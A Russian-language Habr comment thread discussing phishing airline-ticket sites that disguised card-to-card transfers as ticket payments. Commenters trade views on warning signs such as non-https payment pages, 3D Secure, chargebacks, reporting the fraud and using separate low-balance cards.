27.09.2016 10:30+1Мне авиаяндекс показывает дешёвые билеты, лучшее предложение на мой маршрут. Переходишь на сайт S7 — дешёвый выбран, но не заказывается. Если радиобаттон с дешёвого варианта убрать, то вернуть потом нельзя — вариант из списка исчезает. Думал, повезло на баг, как обычно. Но если не только у меня, то, видимо, планомерно этим промышляют.
А самый дешёвый из настоящих доступных вариантов S7 примерно на 5% дороже самого дешёвого у перекупов.
kgbplus
27.09.2016 16:48+2Вам не доводилось слышать про OZON travel? Когда покупаешь билет, а через несколько дней оказывается, что нет у тебя никакого билета, потому что продавец не смог выкупить его по обещанной цене.
gluck59
26.09.2016 14:30+10Пройдемся по шагам.
> 1. Домен в зоне EU должен был по крайней мере насторожить.
Упс. Чем?
По этой логике должны настораживать aviasales.su, rossiya-airlines.com, pobeda.aero, vim-avia.com… да?
> 2. Кроме поиска авиабилетов на сайте было всего несколько страниц, цель которых пустить пыль в глаза.
Все сайты, на которых можно что-то купить, устроены именно так. Пыль может быть разного калибра и в разном количестве, но суть одна и та же.
> 3. Если копнуть глубже, то указанный на странице ОГРН компании принадлежал компании, которая была закрыта в 2011 году.
Здесь и далее — просто без комментариев. Да, это все информация открыта, но никто не мешает мошенникам указать настоящую информацию любой фирмы.
4. Рейтинги сайта ТиЦ и PR нулевые
Это к сожалению, ни о чем не говорит. СЕОшники могут меряться этими циферками, а для обычных людей это птичий язык.
5. Основное, что должно было насторожить. Должна была быть оплата без комиссии, как указано на сайте, 5900 за каждый авиабилет, а в смс от банка пришло назначение «Списание 5900.00 P2P PSBANK»
А начиная с этого момента — уже поздно. Данные карты введены, вуаля.
Итого — обычный человек в подобном случае ничего сделать не может к сожалению.
Остается незакрытым вопрос успешной оплаты без MCSC/VbV — как любит напоминать Сбербанк, это «невозможно»…
Speakus
26.09.2016 19:05Справедливости ради.
А начиная с этого момента — уже поздно. Данные карты введены, вуаля.
Не совсем так. Насколько я знаю — если вы не ввели код из смс от банка — то операцию опротестовать более чем реально. Если же ввели код из смс — то реально только если деньги с той стороны куда перевели получится «заморозить» (т.е. если они там ещё есть).gluck59
26.09.2016 19:20Сорри, но это уже выяснили — если магазин не поддерживает MCSC/VbV, то никаких смс не будет.
А зачем мошенникам ставить препятствия самим себе?Speakus
27.09.2016 08:08Насколько я знаю, если магазин не поддерживает MCSC/VbV то он берёт на себя риски того, что операция будет опротестована.
gluck59
27.09.2016 11:16+2Увы, в данном случае это не сработает потому что на мошенническом сайте вы ничего не покупаете в магазине, а совершаете частный перевод на карту подставного физлица.
Speakus
27.09.2016 14:19Не слышал о переводах на частную карту без смс — но всё равно — на сколько я знаю, правила мастеркарда и визы довольно просты: если нет введения смс — то при опротестовывании операции — все деньги вернут владельцу (видимо за счёт банка — если он допускает операции перевода денег на карту без смс).
djhox
27.09.2016 10:47+2С доменом .aero все, как-раз, нормально — он выдается только организациям связанным с авиаперевозками и для того, что б его получить — нужны соответствующие документы.
bobermai
26.09.2016 14:49+1Неочевидный факт — иногда покупка билета у посредника обходится дешевле, чем напрямую. Но риски повышаются, да.
ApplejackApple
26.09.2016 15:30Не доверяю всем этим посредникам. А если отзывы почитать про всякие синбады и купибилеты, то пропадает желание даже смотреть в сторону посредников.
superyarik
26.09.2016 16:19+1но ведь так получается дороже?
Aingis
26.09.2016 17:21Не-а, обычно сайты посредники берут свою пару сотен рублей.
tyomitch
26.09.2016 18:22+3По-разному. Я видел у посредников цены и на $50 дороже, и на $50 дешевле, чем на такой же рейс на оффсайте авиакомпании.
vlivyur
27.09.2016 09:56Вы ещё скажите что покупка билета туда-обратно всегда дешевле.
Aingis
27.09.2016 11:06Давно уже таких не видел. Несколько лет назад бывали такие. Кажется, была акция Аэрофлота пару лет назад, но не помню туда-обратно или просто дешёвые билеты. Обычно такие акции были на выходные с захватом ночи с субботы на воскресенье.
Возможно, перестали по каким-то соображениям или от того что просекли фишку, что можно брать «парные» билеты. Типа обратно на следующей неделе, а потом в обратном направлении на выходные.
VenomBlood
28.09.2016 01:31+1Seattle-Vienna. Round trip с 1 пересадкой от $1300. One way с одной пересадкой от $2400(!).
Semy
27.09.2016 23:37Я только этим летом билеты на Пхукет покупал. Себе туда-обратно, другу, который уже там был и попросил купить ему обратный билет на тот же рейс купил почти за 80% стоимости своего (который в обе стороны). Аэрофлот. (билеты абсолютно одного класса).
vlivyur
28.09.2016 10:03Ну, а я себе покупал билеты СПб-Нск. Покупал два отдельных билета. Не фиг-то и экономия, но 200 рублей разницы по сравнению с туда-обратно на те же рейсы.
SKolotienko
26.09.2016 14:03+1Вопрос — на той странице, где надо было вводить данные карты для оплаты, был ли https? Ничего подозрительного в его сертификате не было?
somatiq
26.09.2016 14:14+4Судя по отсутствию иконки замка у в адресной строке, там голый http.
SKolotienko
26.09.2016 14:37Да уж. Это должно было насторожить сразу. А то получается что тогда кроме этих мошенников данные карты могли уплыть любому, прослушивающему данный траффик.
LoadRunner
26.09.2016 14:43+7Вас беспокоит, что данные могли достаться другим мошенникам, перехватывающим трафик?
SKolotienko
26.09.2016 14:45+7Ну в каком-то смысле, меня беспокоят не-https страницы, где я должен вводить свою платёжную информацию
somatiq
26.09.2016 15:06+2Это был бы довольно интригующий поворот, как раз в духе статьи (согласитесь, написано увлекательно). Но не, как и товарища ниже, меня в основном смущает необходимость вводить какие-либо личные (не говоря уж о платёжных) данные на сайте без https.
Alexufo
26.09.2016 14:56-3форма может отправлять данные на урл с https а сам сайт крутится на http. Зачем? Может для снижения нагрузки на процессор, вероятно. Видел пару раз на госсайтах.
a553
26.09.2016 16:42+2Нет, не может, это проблема курицы и яйца. Введите в гугл и получите миллион ссылок, почему так делать нельзя. Вот первая.
ainoneko
27.09.2016 11:34У vim-avia весной тоже не было замка. Я тогда на это посмотрел и передумал у них покупать.
xbox
26.09.2016 17:51Выше в комментариях написал только что.
На первом сайте был https.
На втором сайте был http.
Сертификат я не проверял, но каких либо сообщений браузера или антивируса, как это иногда бывает, не выдавалось.
RiseOfDeath
26.09.2016 14:22>>Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS).
А я сталкивался, например в Steam (и не только там).
На соответствующий вопрос сбер мне ответил что-то в духе «На усмотрение магазина».
Собственно ответ:
Ответ Клиенту:
Уважаемый <ФИО>
ОАО «Сбербанк России», рассмотрев Ваше обращение, сообщает следующее.
Согласно Условиям использования банковских карт ОАО «Сбербанк России»:
п. 11.7. — Держатель соглашается с получением услуг через сеть Интернет,
осознавая, что сеть Интернет не является безопасным каналом связи, и
соглашается нести все риски, связанные с возможным нарушением
конфиденциальности и целостности информации при её передаче через сеть
Интернет
Дополнительно сообщаем, что способ подтверждения операции в сети интернет
определяется непосредственно разработчиком сайта.
Обращаем Ваше внимание на то, что с Условиями использования банковских карт
ОАО
«Сбербанк России» Вы можете ознакомиться в подразделениях Банка либо на
сайте
Сбербанка России по адресу (http://www.sbrf.ru/moscow/).
Благодарим Вас за Ваше обращение и надеемся, что наши разъяснения помогли
Вам
разобраться в сложившейся ситуации.
Вопрос Клиента:
При покупке к некоторых онлайн-магазинах не требуется подтверждение в виде
одноразового СМС-пароля (оплата проходит без запроса такового).Volosatik
26.09.2016 15:07+1Любая технология защиты должна поддерживаться обеими сторонами платежа. Если одна из сторон поддерживает какую-либо технологию защиты, а другая нет, то в случае диспута (спора, кто мошенник, и кто должен вернуть деньги) платежная система встает на более «защищенную» сторону.
Такой подход стимулирует участников подключать как можно больше разных степеней защиты (чип на карте, вместо магнитной ленты, временные коды, 3D-secure и прочее). Поэтому если ваш банк поддерживает 3D-Secure (а судя по написанному, так и есть), а получатель платежа не поддерживает (иначе деньги не ушли бы), то на основе вашего заявления в банк начинается диспут между вашим банком и банком получателем. Платежная система присуждает вашему банку пальму победы, как более «защищенному» банку. Банк-получатель_платежа вынужден вернуть эти деньги. И получается, что потерпевшим от действий мошенников становится именно он. Это стимулирует его тщательнее проверять своих клиентов и писать на них заявления в милицию в случае необходимости.
Другое дело, что карты эти могут быть ворованными. Но это уже другая история.
EvilMushroom
26.09.2016 14:28Для тех, кого интересует оплата без смс подтверждения — тот же алиэкспресс проводит транзакции без 3D-Secure подтверждения
olekl
26.09.2016 14:40+4Никогда не понимал тех, кто на первом найденном «поисковике билетов» что-то заказывает… Есть пара проверенных и весьма известных искалок, и есть прямые сайты авиакомпаний… Надеяться, что сторонний сайт магическим образом даст лучшую цену? Ну-ну… Кстати, не отсюда ли ноги растут у мифов о том, что на сайтах авиакомпаний цена динамически меняется, например, после долгого поиска? :)
zagayevskiy
27.09.2016 11:42+3Ничего себе миф. Вчера покупал билеты на delta.com. И что бы вы думали? Первая попытка закончилась "какая-то проблема при покупке, попробуйте ещё раз" — с начала поиска. Вторая — "кажется, этот рейс пользуется спросом, платите на $50 больше или попробуйте ещё раз". Стоимость билетов сначала — $208, то есть подняли на 25% внаглую. Билеты были нужны, чувствую себя последним лохом, но купить пришлось.
Speakus
27.09.2016 14:22+1Есть и другие сайты — не только этот. Зачем продолжать пользоваться тем кто использует полумошеннические схемы?
zagayevskiy
27.09.2016 15:58Так получилось, что я рассчитывал именно на эти билеты и особого выбора больше не было.
alexpp
26.09.2016 14:48У вас на скрине, где вводятся данные карты, указан протокол http. Хотя бы одно это должно было насторожить от всяческих дальнейших действий.
И конечно же, сервисы перевода денег с карты на карту должны заняться проблемой, описанной у вас. Знаю, что представители того же ТКСБ есть на Хабре и ГТ.xbox
26.09.2016 18:00Да это тоже должно настораживать при оплате в интернете.
Но я думаю, что если провести опрос авиапасажиров, у всех, кто покупал билеты через интернет, то процент тех, кто знает, чем отличается http от https, будет сопоставим с процентом проголосовавших на прошедших выборах за непарламентские партии.
Я думаю, что если среднестатистический человек не хочет рисковать, то он покупает билеты на нескольких самых известных сайтах. К примеру, если билет покупается на рейс аэрофолота, то и искать его логично на сайте аэрофлота. А уж если человек находится на сайте аэрофлота, то смотрит ли он на значок http/https в адресной строке, — это вопрос.
kore3d
26.09.2016 14:55А заявление об инциденте в ТКС Банк было отправлено?
Veliant
26.09.2016 14:57Я хоть и не являюсь участником инцидента, но отправил им заявку с предложением фильтровать http-referrer на странице cardtocard с ссылкой на эту публикацию
ValdikSS
26.09.2016 15:00+2Это бессмысленно в случае такого мошенничества, которое описано в статье. Данные все равно проксируются, иначе злоумышленники бы не узнали номер карты.
xbox
26.09.2016 14:59Да, в ТКС я сообщил об этом фишинговом сайте.
По телефону у меня всю информацию под диктовку приняли и оформили в своей системе.
Из контактных данных взяли только адрес почты.
Номер обращения или что-то подобное не сообщали.
С Тиньковым собственно у моего знакомого не было инцидента). Инцидент был с другим банком. А Банк Тинькова уже позже на втором сайте засветился. Поэтому я их предупредил о мошенническом сайте, а формального повода что-то от них просить у меня нет.
Volosatik
26.09.2016 14:59+61. Заявление в банк о мошенническом платеже надо писать не позже, чем в течении суток с момента списания. В этом случае банк должен вернуть вам деньги.
2. Не все сайты спрашивают 3D-Secure. Более того, для списания денег не надо знать ни CVV (CVC), на фамилию-имя. И это никакой не эксплойт, это принцип работы платежной системы.
3. При переводе денег следует проверять, что страница работает через HTTPS.
4. Платежные системы отслеживают количество мошеннических платежей в отчетный период (и общую сумму таких платежей). Как только у банка сумма мошеннических платежей превышает определенный порог, банк попадает на обалдеть какой крупный штраф. После этого, я вас уверяю, собственная служба безопасности банка сама найдет и «накажет» владельца этих сайтов. Так что пишите заявления о мошенническом платеже «чардж бэк» в банк по каждому факту списания. Пишите их сразу, как обнаружите. Не на следующий день, не в выходные, не после отпуска, а сразу (если конечно хотите вернуть свои деньги).
5. И на последок: да, для оплаты в интернете лучше держать отдельную карту, деньги на которую переводить непосредственно перед покупкой. Сейчас многие банки предлагают выпустить виртуальную карту, дополнительную к основной или что-то похожее.
chieftain_yu
26.09.2016 16:02+31. Не списания, а уведомления Вас банком о транзакции.
Если Банк лопухнулся и договоренным способом предупредил вас не своевременно, а только через год — то у вас есть сутки с момента оповещения.
Минус — банки эту дыру знают, и в стандартный договор прописывают, что клиент обязан ежесуточно запрашивать выписку через интернет-банк и все такое.
Birom
27.09.2016 03:56-13Да вы охуеть какой эксперт :)))
По пунктам даже лень идти.
Владелец мерчант аккаунта.Speakus
27.09.2016 08:12+4И всё-таки сделайте усилие над собой — если есть что сказать.
Birom
27.09.2016 10:49+1Ну окей.
1) Это полная чушь.
2) Это зависит от мерчанта. Например американские мерчанты в зависимости от настроек, могут взбрыкнуть на неправильный зип код или даже адрес (да, адрес тоже в авторизации учавствует).
3) По барабану.
4) На штрафы попадает не банк, а мерчант аккаунт. В его же интересах и противодействовать фроду. С меня, например за любой чаржбек лупили сверху $40, что никак не подпадает под «обалдеть какой крупный штраф», как сказал автор выше.
Заявлять о чаржбеках, вовсе не обязательно в тот же день итп. Там срок чуть ли не полгода.
5) Ну может быть и лучше, но я предпочитаю устанавливать лимит по текущей карте и не ломать голову. Перед большим снятием или покупкой прямо с телефона увеличиваю лимит и все окей.Speakus
27.09.2016 14:33Насколько я понимаю ситуацию — когда деньги уходят продавцу — там да — есть куча времени для того чтобы опротестовать операцию. Но если перевод был с карты на карту — я бы рекомендовал поторопится ибо вернуть деньги будет можно если они ещё есть на карте мошенника.
Ну и насчёт https — я бы рекомендовал бы всё же обращать на это внимание — иначе перехватят данные карты и оплатят яндекс-директ мошеннику. Деньги то вы в итоги вернёте — но зачем решать проблемы если можно их просто не создавать.
Konachan700
26.09.2016 15:08Вопрос к форме платежа у банка — как получается, что банк/ПС форму принимает без кукисов и с черти-каким рефером? Это же прекрасная лазейка для мошенников…
lexore
26.09.2016 17:20+3Скрипт на сайте сам лезет на страничку cardtocard, скачивает оттуда страничку оплаты, чуть рихтует, ставит свои адреса и показывает клиенту. После этого обрабатывает ввод клиента и сам генерирует новый запрос в cardtocard. Для cardtocard сервиса все выглядит так, что клиентом является виртуалка на FirstVDS. Клиент-жертва никак не засвечивается.
Это как посылать взрослого дядьку в магазин за сигаретами/пивом, когда вам ещё по возрасту не дают. Если дядька сам не скажет, продавец никогда не узнает, что заказчиком были вы.
Посредничество — это логическая дыра, которую не закрыть никак, кроме как СМС и одноразовыми паролями.
Misery
26.09.2016 15:11-1Какие бурные обсуждения тонкой рекламы безопасного браузера яндыкса, аж слеза выступает.
pnetmon
26.09.2016 15:17насчет браузера яндекса не знаю, а вот строка одного от одного антивируса в скриншоте имеется. сайт avia-scanners.ru сейчас открывается спокойно
xbox
26.09.2016 18:21_avia-scanners.ru_ заблокировал хостинг провейдер firstVDS по моему заявлению. Ночью я им написал. В середине дня «Отдел по борьбе с нелегальной активностью пользователей FirstVDS» отключил соответствующий аккаунт на хостинге. Еще в FirstVDS писал про _aviasalle.com_. Но его не заблокировали. А сам сайт оперативно отключил функционал для мошеннических действий.
Про _avia-scanners.ru_ я заявления провайдеру не писал (хостинг другой). Этот сайт оставил для того, чтобы читатели публикации смогли его препарировать и разобрать. Сейчас этот сайт уже не работает.
bodidron
26.09.2016 15:13+1в «последнем» сайте в разделе контакты, домен сайта, не совпадает с «mailto» http://aviasalle.com/%22mailto:krukov@pilotavia.com/%22
DrReiz
26.09.2016 15:15> Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS)
Есть протокол токенизированных платежей. Сначала при первой оплате создается токен (с 3ds-запросом и кодом из смс), далее все последующие оплаты делаются через токен. При последующих списаниях окно 3ds-а не показывается.
margaritalukyanova
26.09.2016 15:22Всем привет! Появился вопрос — а сайты-генераторы (вроде скайсканера) могут показывать сайты мошенников? Или все же они их не захватывают
mkll
26.09.2016 22:10+1В выдачу метапоисковиков (вроде скайсканера) попадают только партнеры этих метапоисковиков.
springimport
27.09.2016 21:56Только партнеры, да, по крайней мере раньше так было.
Имел отношение к прошлой версии сайта.mkll
27.09.2016 22:24Позвольте, причем здесь «раньше так было»? Оно по-другому быть вообще в принципе не может, поскольку метапоисковик отдал некоему сайту из своей выдачи клиента и должен получить в обратку свою комиссию с этой продажи. Тут бизнес, а не благотворительность.
Gezm0
26.09.2016 15:22Если оставить в стороне чисто технические вопросы реализации, в сухом остатке остаётся главный вывод — паранойя в денежных вопросах никогда не повредит. Нужно принять за аксиому потенциальную небезопасность любых денежных операций. Особенно через интернет. Независимо от уверений банков, что это абсолютно безопасно. Учитывая потенциальный риск, этот риск необходимо ограничить. Для оплаты через интернет использовать карту, на которой нет суммы больше, чем необходимо для оплаты суммы заказа в данный конкретный момент. В идеале вообще лучше иметь отдельную карту для таких операций, потому как если вы думаете, что за вами не следят, далеко не факт, что это так.
xbox
26.09.2016 18:27+1Да это поможет, но только частично.
Если Вам нужно оплатить за билеты 5900р+5900р, то ровно столько Вы положите на карту и столько оплатите. А, в случаях с мошенническими действиями, куда пошла оплата, сразу можно даже не понять. Потерпевший, к примеру, в первом заявлении в Сбербанк указал, что у него украли 17700р+17700р и пытались еще украсть 10800р. При этом человек был уверен, что хоть билеты у него в кармане. Когда выяснилось, что и билетов нет, пришлось писать идти в Сбербанк и писать еще одно заявление.
zim32
26.09.2016 15:32Приходите в банк и пишете заявление. Это называется чарджбэк. Если транзакция была проведена без 3дсекур, то вроде как все уважаемые банки перекладывают ответственность в этом случае на мерчанта (т.е. мерчант должен доказать факт предоставления услуги) иначе деньги возвращаются клиенту.
P.S. Где же спецы с payonline (которы заспамили рекламными постами тут) когда они так нужны.Gezm0
26.09.2016 15:39+1В статье речь идёт про перевод с карты на карту, который замаскирован под оплату в магазине. Вопрос на засыпку. Относятся ли правила относительно мерчантов и 3d secure к переводу с карты на карту?
zim32
26.09.2016 18:24+1Скоре всего да, так как вы «You didn't receive an item ordered». Я думаю это дело можно выиграть. Вы НЕ ДОБРОВОЛЬНО делали п2п платеж
galaxy
26.09.2016 19:13Первый платеж с карты на карту и он подтвержден через 3dsecure. Остальные уже скорее всего обычные покупки
grafstroganov
26.09.2016 18:15Не поможет, особенно со Сбербанком. Где можно оплатить без 3d secure? Да на одноклассниках.ру! Платежный сервис там от mail.ru. Кроме того карта запоминается сразу же! и может кроме всего прочего участвовать как в регулярных платежах так и в последующем без какого либо ввода карты, привязанной к аккаунту ОК. Так вот. У жены взломали акк ОК, и увели деньги, благо не много. майл.ру послал лесом, ОК сказали читайте соглашение, послали туда же, Сбербанк слушать особо не стал, через угрозы что зарегить заявление они обязаны в любом случае, даже если не могут выполнить — зарегили, но отправили в полицию. Итог — денег не вернул никто и возвращать никто не собирается. Так что наивно верить в банк что он там если нет 3дсекур — банк обязан… никому он ничего не обязан!
Daar
26.09.2016 15:37+6Ввиду данной проблемы давно завел себе «помойную» карту, и перевожу на неё требуемую сумму перед оплатой.
А насчет 3D бесит еще другая «мулька», это когда ты первый раз оплатил подписку чего-то, а через время с тебя автоматом сдергивают продление, причем у некоторых сервисов нет толком кнопки Отписаться, надо её где-то искать очень глубоко в меню или через поддержку, но денежка уже ушла и вы увидели СМСку.
Опсосы тоже этим пользуются, хотя у них хоть пишут «Автоплатеж», хотя многие не смотрят остаток. У меня была абонентка 300 руб, а на счете уже 350 лежало, но нефига, пришло сообщение что с карты переведено 300 руб и на счете уже 650… отрубил потом, лучше сам в ручную переведу.
pnetmon
26.09.2016 15:54+1>>После всей этой истории было написано заявление в полицию (на рассмотрении), в сбербанк (на рассмотрении), в Яндекс, хостинг-провайдеру и др.
А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.Vilgelm
26.09.2016 21:24Так там банк получателя — НКО Яндекс Денег. Такие карты оформленные на всяких алкоголиков и не очень умных граждан жаждущих работы продаются по пару тысяч рублей за штуку. Впрочем, продают все, даже ТКС, просто он дороже, а из дешевых Яндекс Деньги и Сбер.
grafstroganov
26.09.2016 21:28у ЯД вроде же там лимиты по средствам, и при таких суммах мошенечества = идентификация, т.е. реальный владелец должен быть известен.
xbox
26.09.2016 22:27>А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.
В Яндекс я писал разные письма. Но письма про то, что получатель украденных средств выводил их на карты, выпущенные банком Яндекса, я не писал. На момент переписки я Яндексом у меня не было такой информации. Её я обнаружил позже. Сейчас уже не знаю, нужно ли в Яндекс писать, или они уже прочитали статью и в курсе.
В выписке Сбербанка номеров карт получателей нет. Когда отправляешь через их личный кабинет, то они присылают подробные смс со всей информацией, включая реквизиты получателя. А когда через посредников шлешь, то информации в смс минимальное количество. В подтверждающих смс может быть даже больше информации, чем доступно на сайте. В сбербанке в личном кабинете есть просто выписка с минимальным количеством информации. В этой выписке есть короткое обозначение расходной или приходной операции. А есть еще полная банковская выписка, в которой нет даже названий контрагентов и назначений платежа. Есть только номера счетов (по большей части внутренние номера счетов сбербанка).xbox
27.09.2016 16:44А банк получателя средств ставили в известность? В выписке наверное и частично реквизиты карты получателя указаны.
27.09.16 я дополнительно написал в Яндекс с указанием пяти обнаруженных номеров банковских карт, на которые выводились украденные средства. Сослался на предыдущую переписку и эту статью.
Вот ответ Яндекса:
Спасибо за Ваше письмо. Необходимые меры по данным картам были приняты.
Мы также будем благодарны Вам за информацию о любых подобных письмах и случаях мошенничества.
Спасибо за запрос.
CAJAX
26.09.2016 16:18EU домен требует чтобы владелец домена был резидентом Евросоюза и некоторые регистраторы требуют предоставить скан документов. Так что есть шанс найти владельца домена через интерпол.
alexhott
26.09.2016 16:231 данные раельной карты ввожу только в форму на сайте банка, предварительно глянув в ssl сертификат. Либо на сайте известной платежной системы, тоже рповерив сертификат.
2 Если очень надо ввести данные карты непонятно в какую форму, то открваю виртуальную карту на нужную сумму — хотябы больше не спишут.
3 Ну и выберу лучше сайт авиакомпании или проверенного перепродавца, пусть на 10-20% дороже чем непонятный сервис.
AlexPu
26.09.2016 17:15+1Да уж… неслабое расследование…
У меня онлайн платежи по кредитной карте всегда требуют авторизации моего банка. Выглядит жто примерно так: после заполнения всез данных и нажатия кнопки «оплатить» или ее аналога, меня перебрасывает на страницу интернет банка, где я и должен пройти авторизацию (с использованием одноразового кода и кода подтверждения) — геморно конечно, но довольно надежно (хотя конечно не на 100%)xbox
26.09.2016 18:36+2Сбербанк тоже всегда перекидывает на страницу, требующую подтверждения кодом СМС при оплате через интернет. Но как оказалось, что это подтверждение требуется не всегда.
Ваш банк, по Вашим словам, всегда требует сразу два кода. Но Вы точно это знаете? Может быть в аналогичной ситуации банк не запросил бы ни одного кода. Пока не попробуете, не узнаете.
Два кода тоже могут не помочь, если Вас обманут. Вас также перекинут на страницу оплаты, где Вы введете столько кодов, сколько нужно, если не заметите подвох.AlexPu
26.09.2016 21:02Да я ТОЧНО знаю, что мой банк действует так как я описал… И второй тоже — я клиент двух банков (схемы авторизации в них немного отличаются, но смысл один). Есть только один вариант, когда коды не запращиваются — если я регистрирую свою карту в каком-то сервисе, нде оплата периодическая — в жтом случае я авторизую всю схему в самый первый раз (т… е. когда регистрирую карту на сервисе) — примеры таких сервисов — Microsoft (Office, Skype), DropBox, AWS… кажется в моем случае это все…
А точно я это знаю потому, что я самолично выставлял соответствующие галочки. Схема с кодами кстати не единственный вариант — можно выбрать и другие — с использованием мобильного придожения например… можно даже с паролем (но там все равно двухфакторная аутентификация)… кажется с СМС еще можно… С кодами доступа оно как-то привычнее — оно по умолчанию… Система достаточно надежная — у нас банки удостоверяют личность (по той-же схеме) для всяких онлайновых сервисов, включая и государственные услуги. А уж онлайновые платежи — я больше за дебетовые карты беспокюсь, чем за кредитную… Там если что гекмор практически обеспечен, хотя деньги скорее всего вернут (был прецедент уже)
rPman
26.09.2016 21:04Это называется 3d-secure и внимание, инициируется магазином, т.е. принимающим деньги.
И самое главное, повторно магазин может не запрашивать эти данные у вашего банка. Пример ozon (и куча других) если вы сохраняете карту в интерфейсе (бывает она сохраняется автоматически, как у ozon но ее можно удалить, правда только при новом заказе, это решение мне сказали в саппорте), первая оплата проходит с sms-подтверждением, все остальные — нет.
Мое имхо, это не защита а видимость, банк сам должен мне прислать sms о запросе средств (кто, сколько и другие подробности) и пока я не пришлю подтверждения… но это неосуществимые мечты, как я понимаю, идеологически, в алгоритме снятия с карты (в тех же ATM на кассах) нет паузы, в течении которой можно реализовать такое подтверждение.Kliba
27.09.2016 03:19У украинского привата, например, помимо 3d-secure еще и своя проверка на все непериодические платежи. Выглядит это так — при любой оплате меня перекидывает на страницу привата где я должен подтвердить оплату. Причем от настроек мерчанта не зависит совершенно(проверял, имеется биллинг для которого настраивал оплату через различные системы, в том числе и напрямую через банк. На время тестов 3d-secure был отключен, но проверка привата все равно была.)
black_semargl
28.09.2016 10:15А тут как раз периодический платёж — сначала заплатил 5900 а на следующий день ещё пачка на ту же сумму с периодом несколько минут.
AlexPu
27.09.2016 06:41Я дам очень краткий ответ — мой банк не перечислит ни копейки, пока я не авторизую платеж описанным способом — вде зависимости от того, что там магазин сохраняет. Исключения я написал — я авторизую периодические платежи от конкретного поставщика услуг (и могу в любой момент это остановить)
vlivyur
27.09.2016 10:08На AliExpress тоже требует код ввести? Что за банк такой?
AlexPu
27.09.2016 13:49и на AliExpress тоже — любая попытка провести платеж по кредитной карте, возвращает требование авторизации у банка-эмитента карты. Магазин может в принципе забить на это и не получить моих денег (например если он не подключился к такому платежному провайдеру, который поддерживает этот протокол), либо перенаправить меня на сайт авторизации моего банка и завершить платеж согласно протоколу. В принципе (именно так — В ПРИНЦИПЕ) я могу разрешить совершать платежи с моей картой без этого протокола, но я этого делать не стану (хотя было бы неплохо ограничить какой-то максимальной суммой в течение дня — скажем 20 евро. Но такой настройки нет… ну… не было года три назад, когда я там ковырялся)
oleg0xff
26.09.2016 17:27Ну так деньги назад вернули или нет? Если нет, прошу отписаться потом по результатам — очень интересно насколько реально оспорить транзакцию.
xbox
26.09.2016 18:38+1Пока неизвестно. Сбербанк написал, что рассмотрение заявления производится в срок до 15 дней (видно на заглавном скриншоте с смс). Срок пока не прошел. Ждем. Результат отпишу.
amarao
26.09.2016 17:31+3Все транзакции без 3Dsecure и карты — cnp-платежи, которые оспариваются в пол-пинка. Если банк козлит — писать в визу. Как в визу писать не знаю, в мастеркард:
https://www.mastercard.ru/ru-ru/consumer/support/emergency-services.html
navion
28.09.2016 01:10+1Это вроде консьерж-сервис, а всё общение с МПС у нас идёт через банк. Зато прямо в законе о НПС прописана обязанность банков возвращать деньги при сообщении в течении суток.
NLO
26.09.2016 17:58НЛО прилетело и опубликовало эту надпись здесь
xbox
26.09.2016 18:59+2Тут конечно все зависит от того, кто это будет расследовать. Если обычные следователи, то их уровень знаний в компьютерной тематике, вероятно, недостаточный, чтобы кого-то найти. Если расследованием подобных дел занимаются высококвалифицированные специалисты, обладающие определенными полномочиями, то конечно все это можно распутать или по крайней мере сделать так, чтобы ситуация не повторялась. Если на помощь правоохранителям придут специалисты крупных банков, специалисты Яндекса, представители хостинг-провайдеров итп, то я думаю есть все шансы вычислить всех мошенников. Службы безопасности крупных банков иногда сами вскрывают мошеннические схемы. Другое дело, что нужно, чтобы все из списка выше, захотели заняться поиском мошенников.
Вот ответ службы поддержки Яндекса на заявление о мошеннических операциях с использованием их сервисов. Ответ был получен пять дней назад. 21/09/2016
Здравствуйте.
По Вашему запросу мы провели расследование и приняли все необходимые меры. К сожалению, деньги уже потрачены, и вернуть их нам не удалось.
При обращении в полицию не забудьте, пожалуйста, рекомендовать лицу, принимавшему у Вас заявление, обратиться для разрешения вопросов, связанных с Вашим заявлением, в подразделения, расследующие преступления в сфере высоких информационных технологий (в России — подразделения Специальных Технических Мероприятий).
В заявлении необходимо максимально точно указать всю имеющуюся у Вас информацию: обстоятельства обмана, номера телефонов и так далее. Также обязательно приложите к заявлению копии квитанций на зачисление денежных средств. Оригиналы этих квитанций могут понадобиться нам, если нам удастся найти Ваши деньги.
Всю имеющуюся у нас информацию, касающуюся данного инцидента, мы предоставим правоохранительным органам по их запросу.
Спасибо за запрос
Яндекс пишет, что деньги потрачены. Но, я надеюсь, что итоговое слово, вернут сумму или нет, за Сбербанком.
И совет Яндекс правильный дает по поводу выбора подразделения. Какое подразделение полиции в конечном итоге будет вести расследование, я не знаю. Заявитель готов содействовать расследованию, но если всякая бумажная переписка и поездки по различным подразделениям затянется на месяцы, то неизвестно до какого момента он будет готов этим заниматься.NLO
26.09.2016 19:13НЛО прилетело и опубликовало эту надпись здесь
tyomitch
26.09.2016 19:30Возможно, вы имели в виду: машалла
(иншалла значит «если Аллах пожелает», и тут по смыслу не подходит.)NLO
26.09.2016 20:03НЛО прилетело и опубликовало эту надпись здесь
black_semargl
28.09.2016 10:18+2Первоначальное скорей было правильно
В арабских странах считается невежливым отказывать прямо, говоря «Нет». В таких случаях Иншаллах примерно может означать, «То, о чём вы меня просите, к сожалению, неосуществимо, если только не вмешается Бог» (ц)
Vilgelm
26.09.2016 21:30Смотрите: мошенник покупает карту оформленную на левого бомжа и принимает на нее платежи. Допустим мы получили данные бомжа и приняли его. Возможно он знает человека, который занимается продажей таких карт (хотя это далеко не факт). Можно даже принять продавца карт, но далеко не факт, что мошенник покупал у него эти карты со своего реального кошелька, а не через биткойн\кошелек, оформленный на левый скан.
Судя по размаху схемы там все должно быть организовано на приличном уровне, поэтому шансы поймать мошенника по данным карт\whois и другой подобной информации минимальны. Но, возможно, мошенник мог расслабиться и спалиться на чем-то другом: например, оплатить хостинг со своей карты или зайти со своего реального IP на сервер. Если и копать, то в эту сторону.Ivan22
27.09.2016 12:39+1Поймать продавца таких карт — уже большое дело, ради которого стоит постараться.
Alexeyslav
27.09.2016 08:45Это работает только в случае если мошенники совсем упоротые и долго пользуются одной и той же картой к тому же оформленной НА СВОЁ реальное имя. Такое, наверно, бывает только в фильмах.
